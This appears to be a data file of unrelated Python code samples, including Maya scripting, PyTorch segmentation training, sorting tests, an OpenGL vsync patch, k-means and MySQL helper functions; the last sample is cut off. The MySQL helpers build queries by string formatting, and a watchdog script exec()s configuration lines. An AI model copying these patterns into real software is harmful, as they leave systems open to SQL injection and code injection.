text stringlengths 8 6.05M |
|---|
import maya.cmds as cmds
def rotateImage(objName, deg):
    """Capture a screenshot of objName at every `deg`-sized step of a full 360 turn.

    BUG FIX: range() requires an int; on Python 3 `360/deg` is a float and the
    original raised TypeError.  `360 // deg` keeps the Python 2 behaviour.

    NOTE(review): despite the name, cmds.xform(translation=...) *moves* the
    object along x rather than rotating it -- confirm the intent.
    """
    for step in range(0, 360 // deg):
        label = 'x' + str(step) + 'y0' + 'z0'
        cmds.xform(objName, relative=True, translation=(deg, 0, 0))
        screenShot(objName, label)
def screenShot(objName, l):
    """Write the current viewport to <ws>/images/<objName><l>.jpg via cmds.refresh.

    BUG FIX: the original mixed '\\' and '/' path separators; forward slashes
    are now used consistently (Maya accepts them on Windows as well).
    """
    ws = 'D:/test'
    wsp = ws + "/" + "images"
    imageSnapshot = wsp + "/" + str(objName) + str(l) + ".jpg"
    # cv=True refreshes the current view; fe/fn select output format and file name.
    cmds.refresh(cv=True, fe="jpg", fn=imageSnapshot)
# Switch the renderer to Viewport 2.0 (mayaHardware2) and capture frames.
import maya.mel as mel  # BUG FIX: `mel` was used below but never imported

cmds.setAttr('defaultRenderGlobals.ren', 'mayaHardware2', type='string')
mel.eval('loadPreferredRenderGlobalsPreset("mayaHardware2")')
name = 'camera1'
l = 'starting'
screenShot(name, l)    # capture the initial frame
rotateImage(name, 90)  # then one frame per 90-degree step
def digit_sum(n):
    """Return the sum of the decimal digits of the integer n.

    Generalized to accept negative integers (the sign is ignored); the
    original raised ValueError on the '-' character.
    """
    total = 0  # renamed from `sum` to avoid shadowing the builtin
    for digit in str(abs(n)):
        total += int(digit)
    return total
import sys, os
sys.path.insert(0, '../vision/')
sys.path.append('../')
from pytorch_segmentation_detection.datasets.pascal_voc import PascalVOCSegmentation
import pytorch_segmentation_detection.models.fcn as fcns
import pytorch_segmentation_detection.models.resnet_dilated as resnet_dilated
from pytorch_segmentation_detection.transforms import (ComposeJoint,
RandomHorizontalFlipJoint,
RandomScaleJoint,
CropOrPad,
ResizeAspectRatioPreserve)
import torch
import torchvision
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torchvision.transforms as transforms
import numbers
import random
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image
from sklearn.metrics import confusion_matrix
def flatten_logits(logits, number_of_classes):
    """Reshape an (N, C, H, W) logits batch into (N*H*W, C).

    Moves the class channel last, then collapses every other dimension so
    each row holds the per-class scores of one spatial location.
    """
    channels_last = logits.permute(0, 2, 3, 1).contiguous()
    return channels_last.view(-1, number_of_classes)
def flatten_annotations(annotations):
    """Collapse an annotation tensor into a 1-D view."""
    flat = annotations.view(-1)
    return flat
def get_valid_annotations_index(flatten_annotations, mask_out_value=255):
    """Return a 1-D LongTensor with the indices of entries != mask_out_value."""
    keep_mask = flatten_annotations != mask_out_value
    return torch.squeeze(torch.nonzero(keep_mask), 1)
# NOTE(review): 'pytorch_image_segmentation' differs from the
# 'pytorch_segmentation_detection' package imported above -- confirm the name.
from pytorch_image_segmentation.transforms import RandomCropJoint

number_of_classes = 21  # PASCAL VOC: 20 object classes + background
labels = range(number_of_classes)

# Joint transform: augment image and mask together, then tensorize the image
# and convert the mask to a LongTensor of class indices.
train_transform = ComposeJoint(
    [
        RandomHorizontalFlipJoint(),
        # RandomCropJoint(crop_size=(224, 224)),
        # [ResizeAspectRatioPreserve(greater_side_size=384),
        #  ResizeAspectRatioPreserve(greater_side_size=384, interpolation=Image.NEAREST)],
        # RandomCropJoint(size=(274, 274))
        # RandomScaleJoint(low=0.9, high=1.1),
        # [CropOrPad(output_size=(288, 288)), CropOrPad(output_size=(288, 288), fill=255)],
        [transforms.ToTensor(), None],
        # [transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), None],
        [None, transforms.Lambda(lambda x: torch.from_numpy(np.asarray(x)).long())]
    ])

# NOTE(review): SplitData is neither defined nor imported in this file --
# confirm where it comes from.
# BUG FIX: forward-slash paths; the originals relied on the deprecated literal
# treatment of the invalid escape '\s' and were Windows-only.
trainset = SplitData('datasets/split_data/train',
                     joint_transform=train_transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=100,
                                          shuffle=True, num_workers=4)

valid_transform = ComposeJoint(
    [
        [transforms.ToTensor(), None],
        # [transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), None],
        [None, transforms.Lambda(lambda x: torch.from_numpy(np.asarray(x)).long())]
    ])
valset = SplitData('datasets/split_data/val',
                   train=False,
                   joint_transform=valid_transform)
valset_loader = torch.utils.data.DataLoader(valset, batch_size=1,
                                            shuffle=False, num_workers=2)

# Fixed 904-image subset of the training set used to track training mIoU.
# BUG FIX: xrange does not exist on Python 3.
train_subset_sampler = torch.utils.data.sampler.SubsetRandomSampler(range(904))
train_subset_loader = torch.utils.data.DataLoader(dataset=trainset, batch_size=1,
                                                  sampler=train_subset_sampler,
                                                  num_workers=2)
# Validation helper used to track MIoU on the held-out set during training.
def validate():
    """Run fcn over valset_loader and return the mean intersection-over-union."""
    fcn.eval()
    aggregate_cm = None
    for batch_image, batch_annotation in valset_loader:
        batch_image = Variable(batch_image.cuda())
        # Argmax over class scores on the GPU, then transfer to the CPU.
        scores = fcn(batch_image).data
        _, predicted = scores.max(1)
        predicted = predicted.squeeze(1)
        predicted_flat = predicted.cpu().numpy().flatten()
        annotation_flat = batch_annotation.numpy().flatten()
        # The mask-out value is ignored by default in sklearn.
        batch_cm = confusion_matrix(y_true=annotation_flat,
                                    y_pred=predicted_flat,
                                    labels=labels)
        aggregate_cm = batch_cm if aggregate_cm is None else aggregate_cm + batch_cm
    true_positives = np.diag(aggregate_cm)
    ground_truth_totals = aggregate_cm.sum(axis=1)
    prediction_totals = aggregate_cm.sum(axis=0)
    union = ground_truth_totals + prediction_totals - true_positives
    per_class_iou = true_positives / union.astype(np.float32)
    mean_iou = np.mean(per_class_iou)
    fcn.train()
    return mean_iou
def validate_train():
    """Return the mean intersection-over-union of fcn on the training subset."""
    fcn.eval()
    aggregate_cm = None
    for batch_image, batch_annotation in train_subset_loader:
        batch_image = Variable(batch_image.cuda())
        # Argmax over class scores on the GPU, then transfer to the CPU.
        scores = fcn(batch_image).data
        _, predicted = scores.max(1)
        predicted = predicted.squeeze(1)
        predicted_flat = predicted.cpu().numpy().flatten()
        annotation_flat = batch_annotation.numpy().flatten()
        # The mask-out value is ignored by default in sklearn.
        batch_cm = confusion_matrix(y_true=annotation_flat,
                                    y_pred=predicted_flat,
                                    labels=labels)
        aggregate_cm = batch_cm if aggregate_cm is None else aggregate_cm + batch_cm
    true_positives = np.diag(aggregate_cm)
    ground_truth_totals = aggregate_cm.sum(axis=1)
    prediction_totals = aggregate_cm.sum(axis=0)
    union = ground_truth_totals + prediction_totals - true_positives
    per_class_iou = true_positives / union.astype(np.float32)
    mean_iou = np.mean(per_class_iou)
    fcn.train()
    return mean_iou
## Define the model and load it to the gpu
if __name__ == '__main__':
    # Resnet18-based FCN (output stride 8) warm-started from a VOC checkpoint.
    fcn = resnet_dilated.Resnet18_8s(num_classes=21)
    fcn.load_state_dict(torch.load('resnet_18_8s_59.pth'))
    res = fcn.resnet18_8s
    # Freeze the whole backbone ...
    for param in res.parameters():
        param.requires_grad = False
    # ... then replace the classifier head with a fresh 1x1 conv (3 outputs)
    # and train only the head.
    res.fc = nn.Conv2d(res.inplanes, 3, 1)
    res.fc.weight.data.normal_(0, 0.01)
    res.fc.bias.data.zero_()
    for param in res.fc.parameters():
        param.requires_grad = True
    fcn.cuda()
    fcn.train()
    # Uncomment to preserve BN statistics
    # fcn.eval()
    # for m in fcn.modules():
    #     if isinstance(m, nn.BatchNorm2d):
    #         m.weight.requires_grad = False
    #         m.bias.requires_grad = False
    ## Define the loss and load it to gpu
    # optimizer = optim.Adam(filter(lambda p: p.requires_grad, fcn.parameters()), lr=0.00001, weight_decay=0.0005)
    criterion = nn.CrossEntropyLoss(size_average=False).cuda()
    # NOTE(review): the optimizer receives *all* parameters, including the
    # frozen backbone; harmless with requires_grad=False, but the filtered
    # version commented above is what was probably intended.
    optimizer = optim.Adam(fcn.parameters(), lr=0.0001, weight_decay=0.0001)
    best_validation_score = 0
    iter_size = 20  # NOTE(review): never used below
    for epoch in range(30):  # loop over the dataset multiple times
        running_loss = 0.0
        for i, data in enumerate(trainloader, 0):
            # get the inputs
            img, anno = data
            # We need to flatten annotations and logits to apply index of valid
            # annotations. All of this is because pytorch doesn't have tf.gather_nd()
            anno_flatten = flatten_annotations(anno)
            index = get_valid_annotations_index(anno_flatten, mask_out_value=255)
            anno_flatten_valid = torch.index_select(anno_flatten, 0, index)
            # wrap them in Variable
            # the index can be acquired on the gpu
            img, anno_flatten_valid, index = Variable(img.cuda()), Variable(anno_flatten_valid.cuda()), Variable(
                index.cuda())
            # zero the parameter gradients
            optimizer.zero_grad()
            # forward + backward + optimize
            logits = fcn(img)
            logits_flatten = flatten_logits(logits, number_of_classes=21)
            logits_flatten_valid = torch.index_select(logits_flatten, 0, index)
            loss = criterion(logits_flatten_valid, anno_flatten_valid)
            loss.backward()
            optimizer.step()
            # print statistics
            # NOTE(review): loss.data[0] is the pre-0.4 PyTorch idiom (loss.item() today).
            running_loss += (loss.data[0] / logits_flatten_valid.size(0))
            if i % 2 == 1:
                # NOTE(review): loss_history, loss_iteration_number_history,
                # loss_current_iteration and the *_axis / *_history plotting
                # objects below are never initialized anywhere in this file --
                # this branch raises NameError at runtime.
                loss_history.append(running_loss / 2)
                loss_iteration_number_history.append(loss_current_iteration)
                loss_current_iteration += 1
                loss_axis.lines[0].set_xdata(loss_iteration_number_history)
                loss_axis.lines[0].set_ydata(loss_history)
                loss_axis.relim()
                loss_axis.autoscale_view()
                loss_axis.figure.canvas.draw()
                running_loss = 0.0
                current_validation_score = validate()
                validation_history.append(current_validation_score)
                validation_iteration_number_history.append(validation_current_iteration)
                validation_current_iteration += 1
                validation_axis.lines[0].set_xdata(validation_iteration_number_history)
                validation_axis.lines[0].set_ydata(validation_history)
                current_train_validation_score = validate_train()
                train_validation_history.append(current_train_validation_score)
                train_validation_iteration_number_history.append(train_validation_current_iteration)
                train_validation_current_iteration += 1
                validation_axis.lines[1].set_xdata(train_validation_iteration_number_history)
                validation_axis.lines[1].set_ydata(train_validation_history)
                validation_axis.relim()
                validation_axis.autoscale_view()
                validation_axis.figure.canvas.draw()
                # Save the model if it has a better MIoU score.
                # NOTE(review): the filename says resnet_101 but the model is Resnet18_8s.
                if current_validation_score > best_validation_score:
                    torch.save(fcn.state_dict(), 'resnet_101_8s_best.pth')
                    best_validation_score = current_validation_score
    print('Finished Training')
    best_validation_score  # NOTE(review): bare expression, has no effect
|
from unittest import TestCase
from sorting import *
# Fixtures for the merge_sort tests.
LIST_ONE = [1, 2, 3, 4, 5]              # already sorted
LIST_TWO = [5, 4, 3, 2, 1]              # reverse sorted
LIST_THREE = [3, 8, 1, 5, 2, 1, 13, 0]  # unordered, with a duplicate
SORTED_LIST_ONE = LIST_ONE[:]           # copy: LIST_ONE is its own sorted form
SORTED_LIST_TWO = SORTED_LIST_ONE[:]    # sorted LIST_TWO equals sorted LIST_ONE
SORTED_LIST_THREE = [0, 1, 1, 2, 3, 5, 8, 13]
class MergeSortTests(TestCase):
    """Unit tests for merge_sort: empty, singleton, two-element and list fixtures."""

    def _check(self, data, expected):
        # Shared helper: merge_sort(data) must equal expected.
        self.assertEqual(merge_sort(data), expected)

    def test_sort_1(self):
        self._check([], [])

    def test_sort_2(self):
        self._check([2], [2])

    def test_sort_3(self):
        self._check([1, 2], [1, 2])

    def test_sort_4(self):
        self._check([2, 1], [1, 2])

    def test_sort_5(self):
        self._check(LIST_ONE, SORTED_LIST_ONE)

    def test_sort_6(self):
        self._check(LIST_TWO, SORTED_LIST_TWO)

    def test_sort_7(self):
        self._check(LIST_THREE, SORTED_LIST_THREE)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix, accuracy_score

# Load the data set: feature columns 1..n-2, label in the last column.
dataset = pd.read_csv('breast_cancer.csv')
x = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, -1].values

# Hold out 25% for testing (no fixed random_state, so the split varies per run).
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)
print(x_test)

# Fit a logistic-regression classifier.
cf = LogisticRegression(random_state=0)
cf.fit(x_train, y_train)

# Predict on the held-out split.
y_pred = cf.predict(x_test)
# print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))

# Confusion matrix and accuracy on the test split.
cm = confusion_matrix(y_test, y_pred)
print(cm)
print(accuracy_score(y_test, y_pred))
# Implement the `activation` and `summatory` methods of the Neuron class.  When you
# start solving the task, copy the corresponding function you wrote in the notebook
# (ignoring indentation; a template is already provided in the answer field -- follow
# it).  The function signature is given in the notebook and must stay unchanged.
# n is the number of samples and m the number of inputs.  input_matrix has shape
# (n, m) and the weight vector has shape (m, 1).  vectorized_forward_pass must
# return an array of shape (n, 1) containing floats; only the correctness of the
# value returned by vectorized_forward_pass is checked.
import numpy as np
def summatory(self, input_matrix):
    """Weighted sum: an (n, m) input times the (m, 1) weight vector -> (n, 1)."""
    return input_matrix @ self.w
def activation(self, summatory_activation):
    """Apply the neuron's activation function to the summatory output."""
    return self.activation_function(summatory_activation)
def vectorized_forward_pass(self, input_matrix):
    """Full forward pass: activation(summatory(input)); returns an (n, 1) float array."""
    return self.activation(self.summatory(input_matrix))
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################################
# #
# check_prev_getnrt_process.py: kill getnrt process if the previous one is still running #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 04, 2021 #
# #
#############################################################################################
import sys
import os
import string
import re
import time
import random
#
#--- reading directory list
#
# Each dir_list line has the form "<value> : <variable name>".
path = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()   # variable name, e.g. bin_dir / mta_dir
    line = atemp[0].strip()  # value (a quoted path string)
    # SECURITY NOTE(review): exec() on file contents -- acceptable only
    # because dir_list is a trusted, locally controlled file.
    exec("%s = %s" % (var, line))
#
#--- append path to a private folders
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
import mta_common_functions as mcf
#
#--- temp writing file name
#
# Unique-ish scratch file name under /tmp for command output.
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#----------------------------------------------------------------------------
#-- check_prev_getnrt_process: kill getnrt process if the previous one is still running
#----------------------------------------------------------------------------
def check_prev_getnrt_process():
    """
    kill getnrt process if the previous one is still running
    input:  none
    output: none
    """
    # Snapshot matching processes into the scratch file.
    cmd = 'ps aux | grep mta | grep python | grep getnrt_control > ' + zspace
    os.system(cmd)
    out = mcf.read_data_file(zspace, remove=1)
    # More than one line means a previous run is still alive.
    if len(out) > 1:
        for ent in out:
            # Skip the line describing this snapshot command itself.
            if re.search('zspace', ent) is not None:
                continue
            # BUG FIX: raw string for the regex; '\s+' in a plain string is a
            # deprecated invalid escape.  (Also dropped the unused pid_list.)
            atemp = re.split(r'\s+', ent)
            cmd = 'kill -9 ' + atemp[1]  # column 1 of ps output is the PID
            os.system(cmd)
#----------------------------------------------------------------------------
if __name__ == "__main__":
    # Script entry point: run the watchdog once.
    check_prev_getnrt_process()
|
class _PipeMeta(type):
    # Metaclass used to observe class creation interactively.
    def __new__(typ, *args, **kwargs):
        # NOTE(review): ipdb breakpoints are deliberate debugging scaffolding.
        import ipdb; ipdb.set_trace()
        return super(_PipeMeta, typ).__new__(typ, *args, **kwargs)
class Pipe(object):
    # NOTE(review): `__metaclass__` is Python 2 syntax; on Python 3 it is
    # silently ignored, so _PipeMeta never runs there.  Use
    # `class Pipe(object, metaclass=_PipeMeta)` for Python 3.
    __metaclass__ = _PipeMeta

    def __new__(cls, *args, **kwargs):
        # Break on allocation to inspect construction order.
        import ipdb; ipdb.set_trace()
        return super(Pipe, cls).__new__(cls)

    def __init__(self, *args, **kwargs):
        # Break on initialization as well.
        import ipdb; ipdb.set_trace()
# Exercise the construction hooks, then break once more at module level.
aaa = Pipe("5")
import ipdb; ipdb.set_trace()
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
import OpenGL.GL as gl
import itertools
#local imports
from common import SETTINGS, COLORS, VSYNC_PATCH_HEIGHT_DEFAULT,\
VSYNC_PATCH_WIDTH_DEFAULT
class VsyncPatch_Version1:
    """Four-quadrant vsync patch.

    The low four bits of ``vsync_value`` are rendered as on/off colored
    sub-squares so a photodiode can read the code off the screen.
    """

    def __init__(self, left, bottom, width, height,
                 on_color=COLORS['white'],
                 off_color=COLORS['black'],
                 ):
        # Patch corner geometry, counter-clockwise from bottom-left.
        self.vertices = np.array(((left, bottom),
                                  (left + width, bottom),           # right bottom
                                  (left + width, bottom + height),  # right top
                                  (left, bottom + height),          # left top
                                  ))
        self.left = left
        self.bottom = bottom
        self.width = width
        self.height = height
        self.on_color = on_color
        self.off_color = off_color
        self.t0 = None
        self.vsync_value = None
        self.ready_to_render = None

    def start_time(self, t, vsync_value=0):
        """Begin an epoch at time t, displaying the given 4-bit code."""
        self.t0 = t
        self.vsync_value = vsync_value
        self.ready_to_render = True

    def update(self, t, dt):
        # NOTE(review): the original comment said "only update when ready",
        # but the code unconditionally marks the patch renderable.
        self.ready_to_render = True

    def compute_bit_colors(self):
        """Return [bit0..bit3] colors; bit0 doubles as the vsync trigger bit.

        IMPROVEMENT: a loop over the four bit masks replaces four copy-pasted
        if/else branches (behavior unchanged).
        """
        return [self.on_color if self.vsync_value & mask else self.off_color
                for mask in (0b0001, 0b0010, 0b0100, 0b1000)]

    def render(self):
        """Draw the four bit quadrants with lighting temporarily disabled."""
        if self.vsync_value is not None:  # idiom fix: was `not ... is None`
            left, bottom, width, height = (self.left, self.bottom, self.width, self.height)
            bit_colors = self.compute_bit_colors()
            gl.glLoadIdentity()
            gl.glDisable(gl.GL_LIGHTING)
            try:
                half_w = width / 2.0
                half_h = height / 2.0
                # Each glRectf call is left,bottom -> right,top.
                # bit 0: bottom/right corner, also the vsync trigger bit
                gl.glColor3f(*bit_colors[0])
                gl.glRectf(left + half_w, bottom, left + width, bottom + half_h)
                # bit 1: bottom/left corner
                gl.glColor3f(*bit_colors[1])
                gl.glRectf(left, bottom, left + half_w, bottom + half_h)
                # bit 2: top/left corner
                gl.glColor3f(*bit_colors[2])
                gl.glRectf(left, bottom + half_h, left + half_w, bottom + height)
                # bit 3: top/right corner
                gl.glColor3f(*bit_colors[3])
                gl.glRectf(left + half_w, bottom + half_h, left + width, bottom + height)
            finally:
                gl.glEnable(gl.GL_LIGHTING)

    @classmethod
    def make_bottom_right(cls,
                          screen_bottom,
                          screen_right,
                          patch_width=VSYNC_PATCH_WIDTH_DEFAULT,
                          patch_height=VSYNC_PATCH_HEIGHT_DEFAULT,
                          ):
        """Construct the patch anchored to the bottom-right screen corner."""
        return cls(left=screen_right - patch_width,
                   bottom=screen_bottom,
                   width=patch_width,
                   height=patch_height)
class VsyncPatch_Version2:
    """ The vSync code is sent as a timing between the start of two white
    pulses, pulse_interval = VSYNC_TIMING_BASE*VSYNC_CODE.
    """
    # Timing constants are in seconds (expressed as frames at 60 FPS).
    PULSE_DURATION = 4.0/60.0  #4 frames at 60 FPS
    VSYNC_TIMING_BASE = 4.0/60.0  #4 frames at 60 FPS
    VSYNC_PATCH_WIDTH_DEFAULT = 0.05
    VSYNC_PATCH_HEIGHT_DEFAULT = 0.05
    VSYNC_BACKGROUND_MARGIN = 0.05

    def __init__(self, left, bottom, width, height,
                 on_color = COLORS['white'],
                 off_color = COLORS['black'],
                 display_rate = 144, #Hz
                 ):
        # NOTE(review): display_rate is accepted but never stored or used.
        # Patch corner geometry, counter-clockwise from bottom-left.
        self.vertices = np.array(((left , bottom),
                                  (left+width, bottom), #right bottom
                                  (left+width, bottom + height), #right top
                                  (left , bottom + height), #left top
                                  ))
        self.left = left
        self.bottom = bottom
        self.width = width
        self.height = height
        self.on_color = on_color
        self.off_color = off_color
        self.ready_to_render = False
        self.t0 = None  # epoch start time, set by start_time()
        # Pulse state machine: current patch color, whether a pulse is live,
        # the code-encoding inter-pulse interval, and the pulse edge times.
        self._patch_color = None
        self._pulse_active = False
        self._pulse_interval = None
        self._start_of_pulse_time = None
        self._end_of_pulse_time = None

    def start_time(self, t, vsync_value):
        """Begin an epoch at time t; vsync_value > 0 starts the first pulse."""
        self.t0 = t
        if vsync_value > 0:
            #begin the first pulse
            self._pulse_active = True
            self._patch_color = self.on_color
            # +0.25 biases the interval so decoding rounds to the right code.
            self._pulse_interval = (vsync_value + 0.25)*self.VSYNC_TIMING_BASE
            self._start_of_pulse_time = t
            print("START:",t)
            #print("\tpulse_interval =",self._pulse_interval)
        else:
            self._patch_color = self.off_color
            self._pulse_interval = None
            self._pulse_active = False
        self.ready_to_render = True

    def update(self, t, dt):
        """Advance the two-pulse state machine to time t."""
        #control the pulse display when it is active
        if self._pulse_active:
            self.ready_to_render = True
            pdt = t - self._start_of_pulse_time
            if ( pdt >= self.PULSE_DURATION): #pulse period is over
                print("PULSE OFF:",t - self.t0)
                self._end_of_pulse_time = t
                self._pulse_active = False
                self._patch_color = self.off_color
        elif (not self._pulse_interval is None):
            # Waiting between pulses.  NOTE(review): this branch assumes the
            # first pulse already completed (sets _end_of_pulse_time).
            pdt = t - self._end_of_pulse_time
            if ( pdt >= self._pulse_interval): #begin final pulse, but not too early
                print("END:",t - self.t0)
                print("pdt =", pdt)
                print("pdt/VSYNC_TIMING_BASE = %f" % (pdt/self.VSYNC_TIMING_BASE,))
                self._pulse_active = True
                self._patch_color = self.on_color
                self._pulse_interval = None #invalidate for rest of epoch
                self._start_of_pulse_time = t
                self.ready_to_render = True
        else:
            # Epoch finished: nothing left to draw.
            self.ready_to_render = False

    def render(self):
        """Draw the always-black background margin, then the patch itself."""
        left, bottom, width, height = (self.left,self.bottom,self.width,self.height)
        bg_margin = self.VSYNC_BACKGROUND_MARGIN
        gl.glLoadIdentity()
        gl.glDisable(gl.GL_LIGHTING)
        try:
            #draw the background which is always black
            gl.glColor3f(*self.off_color)
            gl.glRectf(left - bg_margin, bottom - bg_margin, left + width + bg_margin, bottom + height + bg_margin) #left,bottom -> right,top
            #draw the patch in its current pulse color
            gl.glColor3f(*self._patch_color)
            gl.glRectf(left, bottom, left + width, bottom + height) #left,bottom -> right,top
        finally:
            gl.glEnable(gl.GL_LIGHTING)

    @classmethod
    #define the vsync patch as being in the bottom right corner
    def make_bottom_right(cls,
                          screen_bottom,
                          screen_right,
                          patch_width = None,
                          patch_height = None,
                          ):
        """Construct a patch anchored at the bottom-right screen corner."""
        if patch_width is None:
            patch_width = cls.VSYNC_PATCH_WIDTH_DEFAULT
        if patch_height is None:
            patch_height = cls.VSYNC_PATCH_HEIGHT_DEFAULT
        obj = cls(left = screen_right - patch_width,
                  bottom = screen_bottom,
                  width = patch_width,
                  height = patch_height
                  )
        return obj
|
'''
Created on Nov 25, 2014

@author: Idan
'''
# k-means demo driver.
#   P     = number of samples
#   K1    = number of clusters
#   Iter1 = number of iterations to finish
#   S     = times of re-execution
from k_mean_module import create_test_set1, my_k_means, plot_results, create_test_set2

P = 8000
K1 = 4
Iter1 = 100
S = 1

x1 = create_test_set1(P, N=2, sig=1)
# x1 = create_test_set2(P, N=2, sig1=1, sig2=0.25, q=0.70)

# Re-run clustering S times; only the last run's result is plotted.
# CLEANUP: replaces the original i/while counter machinery and removes the
# no-op `if __name__ == '__main__': pass` (behavior unchanged for i=0).
for _ in range(S):
    res1, centroids = my_k_means(x1, K1, Iter1)
    # d = distance_from_means(centroids)
    # a = distance_from_means(centroids, [[2, 3], [3, 2], [4, 1], [-1, 0]])
    # print d

plot_results(x1, res1, centroids)
"""Modoboa - Mail hosting made simple."""
from pkg_resources import DistributionNotFound, get_distribution
try:
    # NOTE(review): pkg_resources is deprecated; importlib.metadata.version()
    # is the modern stdlib equivalent.
    __version__ = get_distribution(__name__).version
except DistributionNotFound:
    # package is not installed
    pass
def modoboa_admin():
    """Command-line entry point: delegate to modoboa.core's command handler."""
    # Imported lazily so the package can be imported without Django set up.
    from modoboa.core.commands import handle_command_line
    handle_command_line()
|
# -*- coding: utf-8 -*-
'''Demonstrates what happens when Python methods share a name.'''
# Python has no method overloading: when several methods share a name,
# only the last definition takes effect.
class Person:
    def say_hi(self):
        # Shadowed by the second say_hi below -- never callable on instances,
        # since Python keeps only the last definition of a name.
        print("hello!")

    def say_hi(self, name):
        print("{0},hello".format(name))
p1 = Person()
# p1.say_hi()  # would raise TypeError: say_hi() missing 1 required positional argument: 'name'
p1.say_hi('fanwei')
from datetime import datetime
import MySQLdb
import configparser
import logging
# Append UTF-8 logs to the pow log file.
logging.basicConfig(handlers=[logging.FileHandler('/var/www/pow/pow.log', 'a', 'utf-8')],
                    level=logging.INFO)
# Read config and parse constants
config = configparser.ConfigParser()
config.read('/var/www/pow/config.ini')
# DB connection settings
DB_HOST = config.get('webhooks', 'host')
DB_USER = config.get('webhooks', 'user')
DB_PW = config.get('webhooks', 'password')
DB_SCHEMA = config.get('webhooks', 'schema')
DB_PORT = config.get('webhooks', 'db_port')  # read as str; cast to int at connect time
def get_db_data(db_call):
    """
    Retrieve data from DB

    Executes db_call and returns all rows (tuple of tuples).
    BUG FIX: cursor and connection are now closed even if the query raises;
    the original leaked both on error.
    """
    db = MySQLdb.connect(host=DB_HOST, port=int(DB_PORT), user=DB_USER, passwd=DB_PW, db=DB_SCHEMA, use_unicode=True,
                         charset="utf8")
    db_cursor = db.cursor()
    try:
        db_cursor.execute(db_call)
        db_data = db_cursor.fetchall()
    finally:
        db_cursor.close()
        db.close()
    return db_data
def set_db_data(db_call):
    """
    Enter data into DB

    Executes db_call and commits.  ProgrammingError is logged and re-raised.
    BUG FIX: cursor and connection are closed in a finally block; the
    original leaked them when any exception other than ProgrammingError
    was raised.
    """
    db = MySQLdb.connect(host=DB_HOST, port=int(DB_PORT), user=DB_USER, passwd=DB_PW, db=DB_SCHEMA, use_unicode=True,
                         charset="utf8")
    db_cursor = db.cursor()
    try:
        db_cursor.execute(db_call)
        db.commit()
    except MySQLdb.ProgrammingError as e:
        logging.info("{}: Exception entering data into database".format(datetime.now()))
        logging.info("{}: {}".format(datetime.now(), e))
        raise e
    finally:
        db_cursor.close()
        db.close()
def bulk_client_update(clients):
    """
    Provide a bulk insert for the client list

    Clears client_list, resets its auto-increment, then inserts every
    provided client in a single INSERT statement.  Raises whatever the
    insert raises, after logging it.

    SECURITY NOTE(review): values are spliced into the SQL with str.format;
    if client fields can contain quotes or untrusted text this is injectable.
    Prefer a parameterized API when possible.
    """
    # First, delete all the clients in the table
    set_db_data("DELETE FROM client_list")
    # Next, reset auto increment to 1
    set_db_data("ALTER TABLE client_list AUTO_INCREMENT = 1")
    # Then, build one multi-row INSERT for all provided clients.
    create_row_call = ("INSERT INTO client_list (client_id, client_address, client_type, "
                       "client_demand_count, client_precache_count) VALUES ")
    try:
        # IMPROVEMENT: join() replaces the index==0 special-casing; the
        # " , " separator reproduces the original SQL text exactly.
        rows = ["('{}', '{}', '{}', {}, {})".format(client['client_id'],
                                                    client['client_address'],
                                                    client['client_type'].upper(),
                                                    client['client_demand_count'],
                                                    client['client_precache_count'])
                for client in clients]
        create_row_call = create_row_call + " , ".join(rows)
        set_db_data(create_row_call)
    except Exception as e:
        logging.info("{}: Exception inserting clients into database".format(datetime.now()))
        logging.info("{}: {}".format(datetime.now(), e))
        raise e
    logging.info("Clients set successfully in DB.")
def bulk_service_update(services):
    """
    Provide a bulk insert for the service list

    SECURITY NOTE(review): values are spliced into SQL with str.format and
    only single quotes are escaped -- prefer a parameterized API.
    NOTE(review): the branches below treat the string 'null' and Python None
    asymmetrically when the two fields are mixed (e.g. name == 'null' while
    web is None formats the literal text 'None' into the SQL) -- confirm
    this is intended before simplifying.
    """
    # First, delete all the clients in the table
    delete_service_table = "DELETE FROM service_list"
    set_db_data(delete_service_table)
    # Then, update the client table with all provided clients
    create_row_call = "INSERT INTO service_list (service_id, service_name, service_web) VALUES "
    try:
        for index, service in enumerate(services):
            # Escape single quotes by doubling them (SQL string-literal rule).
            if service['service_id'] is not None:
                id = service['service_id'].replace("'", "''")
            else:
                id = service['service_id']
            if service['service_name'] is not None:
                name = service['service_name'].replace("'", "''")
            else:
                name = service['service_name']
            if service['service_web'] is not None:
                web = service['service_web'].replace("'", "''")
            else:
                web = service['service_web']
            if index == 0:
                # First tuple: no leading separator.
                if (name == 'null' and web != 'null') or (name is None and web is not None):
                    create_row_call = create_row_call + ("('{}', Null, '{}')".format(id, web))
                elif (name == 'null' and web == 'null') or (name is None and web is None):
                    create_row_call = create_row_call + ("('{}', Null, Null)".format(id))
                elif name != 'null' and web == 'null' or (name is not None and web is None):
                    create_row_call = create_row_call + ("('{}', '{}', Null)".format(id, name))
                else:
                    create_row_call = create_row_call + ("('{}', '{}', '{}')".format(id, name, web))
            else:
                # Subsequent tuples: comma-separated.
                if (name == 'null' and web != 'null') or (name is None and web is not None):
                    create_row_call = create_row_call + (", ('{}', Null, '{}')".format(id, web))
                elif (name == 'null' and web == 'null') or (name is None and web is None):
                    create_row_call = create_row_call + (", ('{}', Null, Null)".format(id))
                elif (name != 'null' and web == 'null') or (name is not None and web is None):
                    create_row_call = create_row_call + (", ('{}', '{}', Null)".format(id, name))
                else:
                    create_row_call = create_row_call + (", ('{}', '{}', '{}')".format(id, name, web))
